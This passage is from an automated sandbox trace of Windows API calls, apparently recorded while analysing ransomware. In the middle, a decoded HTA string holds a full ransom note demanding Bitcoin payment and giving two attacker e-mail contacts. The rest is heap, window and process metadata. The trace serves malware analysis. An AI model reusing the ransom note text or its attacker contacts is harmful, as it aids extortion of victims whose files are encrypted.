(in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0259.802] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0259.802] PtInRect (lprc=0x22f178, pt=0x217) returned 1 [0259.802] GetCurrentThreadId () returned 0xe9c [0259.802] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0260.102] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0260.102] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0260.102] GetCapture () returned 0x0 [0260.102] WindowFromPoint (Point=0x193) returned 0x100f8 [0260.102] IsChild (hWndParent=0x201f2, hWnd=0x100f8) returned 0 [0260.102] GetMessageTime () returned 305028 [0260.102] GetMessagePos () returned 0x4c0193 [0260.102] KillTimer (hWnd=0x30204, uIDEvent=0x2001) returned 1 [0260.102] GetCapture () returned 0x0 [0260.103] ClientToScreen (in: hWnd=0x201f2, lpPoint=0x22f354 | out: lpPoint=0x22f354) returned 1 [0260.103] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xf8) returned 0x4bcd80 [0260.103] GetCurrentThreadId () returned 0xe9c [0260.103] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46d8c0 | out: hHeap=0x450000) returned 1 [0260.103] GetCurrentThreadId () returned 0xe9c [0260.103] GetCurrentThreadId () returned 0xe9c [0260.103] ClientToScreen (in: hWnd=0x201f2, lpPoint=0x22f358 | out: lpPoint=0x22f358) returned 1 [0260.103] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xf8) returned 0x474120 [0260.103] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x474120 | out: hHeap=0x450000) returned 1 [0260.104] ClientToScreen (in: hWnd=0x201f2, lpPoint=0x22f358 | out: lpPoint=0x22f358) returned 1 [0260.104] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xf8) returned 0x474120 [0260.104] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x474120 | out: hHeap=0x450000) returned 1 [0260.104] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x4919c8, hWnd=0x201f2, msg=0x2a3, wParam=0x0, lParam=0x0, plResult=0x22f44c | out: plResult=0x22f44c) returned 0x1 [0260.104] NtdllDefWindowProc_W () returned 0x0 [0260.104] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4bcd80 | out: hHeap=0x450000) returned 1 [0260.104] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4c02b0 | out: hHeap=0x450000) returned 1 [0260.104] GetMessageW (lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0) Thread: id = 219 os_tid = 0xea0 Thread: id = 220 os_tid = 0xea4 [0109.719] GetCurrentThreadId () returned 0xea4 [0109.719] LoadLibraryW (lpLibFileName="mshtml.dll") returned 0x73bd0000 [0109.719] CoInitialize (pvReserved=0x0) returned 0x0 [0109.719] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x927c0) returned 0x0 [0109.720] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1006) returned 0x495e50 [0109.720] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x494b28 | out: hHeap=0x450000) returned 1 [0109.720] IInternetProtocol:Read (in: This=0x493b50, pv=0x495f18, cb=0xf38, pcbRead=0xd5fc8c | out: pv=0x495f18, pcbRead=0xd5fc8c*=0xc40) returned 0x1 [0109.721] IInternetProtocolRoot:Terminate (This=0x493b50, dwOptions=0x0) returned 0x0 [0109.721] IUnknown:Release (This=0x493464) returned 0x4 [0109.721] IUnknown:Release (This=0x49349c) returned 0x3 [0109.721] IUnknown:Release (This=0x49349c) returned 0x2 [0109.721] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1a16) returned 0x496e60 [0109.721] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x495e50, cbMultiByte=3336, lpWideCharStr=0x496e64, cchWideChar=3336 | out: lpWideCharStr="\r\r\n\r\r\n \r\r\n \r\r\n \r\r\n\r\r\n\r\r\n\r\r\n

Warning!

\r\r\n

\r\r\n All your files have been encrypted due to a security problem with your PC.\r\r\n
If you want to restore them, write us to the e-mail:\r\r\n
1) generalchin@countermail.com\r\r\n
2) generalchin@smime.ninja (if you do not receive a response from the first mailbox)\r\r\n
\r\r\n
You have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\r\r\n
After payment we will send you the decryption tool that will decrypt all your files.\r\r\n

\r\r\n

\r\r\n Free decryption as guarantee\r\r\n
Before paying you can send us up to 1 files for free decryption.\r\r\n
The total size of files must be less than 500 Kb (non archived), and files should not contain valuable information. (databases, backups, large excel sheets, etc.)\r\r\n

\r\r\n\r\r\n \r\r\n") returned 3336 [0109.721] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x108) returned 0x498880 [0109.721] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x12) returned 0x495268 [0109.722] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x495268 | out: hHeap=0x450000) returned 1 [0109.722] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x68) returned 0x493830 [0109.722] IUnknown:AddRef (This=0x47c264) returned 0x14 [0109.722] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x1a8) returned 0x498990 [0109.722] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0xd5fbd4 | out: lpCPInfo=0xd5fbd4) returned 1 [0109.722] IUnknown:AddRef (This=0x488270) returned 0x4 [0109.722] IUnknown:AddRef (This=0x47c264) returned 0x15 [0109.722] IUnknown:QueryInterface (in: This=0x47c264, riid=0x73d8d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0xd5fbdc | out: ppvObject=0xd5fbdc*=0x47c264) returned 0x0 [0109.722] IUnknown:Release (This=0x47c264) returned 0x15 [0109.722] IUnknown:AddRef (This=0x47c264) returned 0x16 [0109.722] IUri:GetScheme (in: This=0x47c264, pdwScheme=0xd5fbe0 | out: pdwScheme=0xd5fbe0*=0x9) returned 0x0 [0109.722] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x8006) returned 0x498b40 [0109.723] IUnknown:Release (This=0x47c264) returned 0x15 [0109.723] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1006) returned 0x4a0b50 [0109.723] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x4000) returned 0x4a1b60 [0109.724] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4a1b60 | out: hHeap=0x450000) returned 1 [0109.724] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x108) returned 0x4a1b60 [0109.725] StrChrW (lpStart="HTA:APPLICATION", wMatch=0x3a) returned=":APPLICATION" [0109.725] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4c) returned 0x490548 [0109.725] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4) returned 0x47bbc0 [0109.726] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20) returned 0x491928 [0109.726] StrCmpICW (pszStr1="PUBLIC", pszStr2="HTA") returned 8 [0109.726] StrCmpICW (pszStr1="HTA", pszStr2="HTA") returned 0 [0109.726] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x1c) returned 0x491950 [0109.726] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1c) returned 0x491978 [0109.726] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x464838 [0109.726] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x20) returned 0x4919a0 [0109.726] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x208) returned 0x4a1c70 [0109.726] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4a1b60 | out: hHeap=0x450000) returned 1 [0109.726] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x492f88 [0109.726] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x4c) returned 0x4905a0 [0109.726] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x800) returned 0x4a1e80 [0109.726] IsCharSpaceW (wch=0xd) returned 1 [0109.726] IsCharSpaceW (wch=0xd) returned 1 [0109.726] IsCharSpaceW (wch=0xa) returned 1 [0109.726] IsCharSpaceW (wch=0x62) returned 0 [0109.726] IsCharAlphaNumericW (ch=0x20) returned 0 [0109.726] IsCharSpaceW (wch=0x20) returned 1 [0109.726] IsCharSpaceW (wch=0x7b) returned 0 [0109.726] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4a1e80 | out: hHeap=0x450000) returned 1 [0109.726] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4905a0 | out: hHeap=0x450000) returned 1 [0109.726] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x492f88 | out: hHeap=0x450000) returned 1 [0109.726] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x408) returned 0x4a1e80 [0109.727] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4a1c70 | out: hHeap=0x450000) returned 1 [0109.729] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x927c0) returned 0x0 [0112.898] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x496b58, cbMultiByte=0, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 0 [0112.898] StrChrW (lpStart="HTA:APPLICATION", wMatch=0x3a) returned=":APPLICATION" [0112.898] StrCmpICW (pszStr1="PUBLIC", pszStr2="HTA") returned 8 [0112.898] StrCmpICW (pszStr1="PUBLIC", pszStr2="HTA") returned 8 [0112.898] StrCmpICW (pszStr1="HTA", pszStr2="HTA") returned 0 [0112.898] StrCmpICW (pszStr1="APPLICATION", pszStr2="APPLICATION") returned 0 [0112.898] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x202) returned 0x4bd720 [0112.898] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="XMLNS", cchCount1=-1, lpString2="ID", cchCount2=2) returned 3 [0112.898] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="XMLNS", cchCount1=-1, lpString2="APPLICATIONNAME", cchCount2=15) returned 3 [0112.898] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x208) returned 0x4bd930 [0112.899] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="XMLNS", cchCount1=-1, lpString2="BORDER", cchCount2=6) returned 3 [0112.899] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="XMLNS", cchCount1=-1, lpString2="CONTEXTMENU", cchCount2=11) returned 3 [0112.899] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="XMLNS", cchCount1=-1, lpString2="MAXIMIZEBUTTON", cchCount2=14) returned 3 [0112.899] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="XMLNS", cchCount1=-1, lpString2="MINIMIZEBUTTON", cchCount2=14) returned 3 [0112.899] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="XMLNS", cchCount1=-1, lpString2="RESIZE", cchCount2=6) returned 3 [0112.899] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="XMLNS", cchCount1=-1, lpString2="SCROLL", cchCount2=6) returned 3 [0112.899] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="XMLNS", cchCount1=-1, lpString2="SINGLEINSTANCE", cchCount2=14) returned 3 [0112.899] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="XMLNS", cchCount1=-1, lpString2="WINDOWSTATE", cchCount2=11) returned 3 [0112.899] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4bd720 | out: hHeap=0x450000) returned 1 [0112.899] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x4b9f38 [0112.899] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x4c) returned 0x490a18 [0112.899] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x800) returned 0x4bf5e8 [0112.899] IsCharSpaceW (wch=0xd) returned 1 [0112.899] IsCharSpaceW (wch=0xd) returned 1 [0112.899] IsCharSpaceW (wch=0xa) returned 1 [0112.899] IsCharSpaceW (wch=0x62) returned 0 [0112.899] IsCharAlphaNumericW (ch=0x20) returned 0 [0112.899] IsCharSpaceW (wch=0x20) returned 1 [0112.899] IsCharSpaceW (wch=0x7b) returned 0 [0112.899] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4bf5e8 | out: hHeap=0x450000) returned 1 [0112.899] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x490a18 | out: hHeap=0x450000) returned 1 [0112.899] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4b9f38 | out: hHeap=0x450000) returned 1 [0112.899] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x408) returned 0x4bf5e8 [0112.900] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x927c0) Thread: id = 221 os_tid = 0xea8 [0110.102] GetCurrentThreadId () returned 0xea8 [0179.655] GetCurrentThreadId () returned 0xea8 Thread: id = 222 os_tid = 0xeac [0110.110] GetCurrentThreadId () returned 0xeac Thread: id = 223 os_tid = 0xeb0 [0110.111] GetCurrentThreadId () returned 0xeb0 [0202.893] GetCurrentThreadId () returned 0xeb0 Process: id = "44" image_name = "wmiadap.exe" filename = "c:\\windows\\system32\\wbem\\wmiadap.exe" page_root = "0x56d19000" os_pid = "0xf94" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "20" os_parent_pid = "0x370" cmd_line = "wmiadap.exe /F /T /R" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 241 os_tid = 0xf98 Thread: id = 242 os_tid = 0xf9c Thread: id = 243 os_tid = 0xfa0 Thread: id = 244 os_tid = 0xfa4 Thread: id = 266 os_tid = 0xfa8 Thread: id = 267 os_tid = 0xfac Process: id = "45" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x24f0e000" os_pid = "0x2c8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "20" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b7a5" [0xc000000f], "LOCAL" [0x7] Thread: id = 245 os_tid = 0xf30 Thread: id = 246 os_tid = 0xed8 Thread: id = 247 os_tid = 0xecc Thread: id = 248 os_tid = 0x9fc Thread: id = 249 os_tid = 0xa3c Thread: id = 250 os_tid = 0x408 Thread: id = 251 os_tid = 0x5d4 Thread: id = 252 os_tid = 0x5f8 Thread: id = 253 os_tid = 0x5f0 Thread: id = 254 os_tid = 0x5ec Thread: id = 255 os_tid = 0x5d0 Thread: id = 256 os_tid = 0x5cc Thread: id = 257 os_tid = 0x12c Thread: id = 258 os_tid = 0x170 Thread: id = 259 os_tid = 0x3c0 Thread: id = 260 os_tid = 0x3b8 Thread: id = 261 os_tid = 0x3a8 Thread: id = 262 os_tid = 0x2fc Thread: id = 263 os_tid = 0x2f8 Thread: id = 264 os_tid = 0x2d4 Thread: id = 265 os_tid = 0x2cc Thread: id = 272 os_tid = 0xfc4 Thread: id = 276 os_tid = 0xfe4 Thread: id = 279 os_tid = 0xcdc